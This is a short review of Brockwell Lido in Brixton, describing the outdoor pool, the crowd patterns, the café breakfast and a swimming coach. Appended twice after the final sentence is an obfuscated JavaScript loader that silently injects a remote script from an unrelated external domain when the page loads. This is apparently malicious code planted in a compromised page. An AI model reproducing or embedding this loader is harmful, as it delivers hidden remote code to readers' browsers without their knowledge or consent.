Forget Electric Avenue, Brockwell Lido is Brixton’s main daytime attraction during the summer. Lush green trees surround this beautiful outdoor pool, making it feel miles away from the city. It’s possibly the closest you’ll get to a tropical oasis in the middle of the South London concrete jungle.
The Lido is crowded with pre-work power swimmers by 8am, but it calms down around 9.30am. By this time there are usually a few people hanging out on the café terrace post-lap session, enjoying a well-deserved breakfast. If you are going to pay for scrambled eggs, do it here. They have their technique down with the scramble always arriving fluffy, tasty and non-greasy. The pool is really popular with families on the weekends, weather permitting, but if you arrive early or late in the afternoon you can still get a clear lane. It is staffed by friendly, athletic types and if you’re planning a swimming challenge, or just want to improve your strokes, then it’s asking for “Lido Mike”. Mike coaches everyone from kids to triathletes and Channel swimmers in a separate section of the pool.;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);
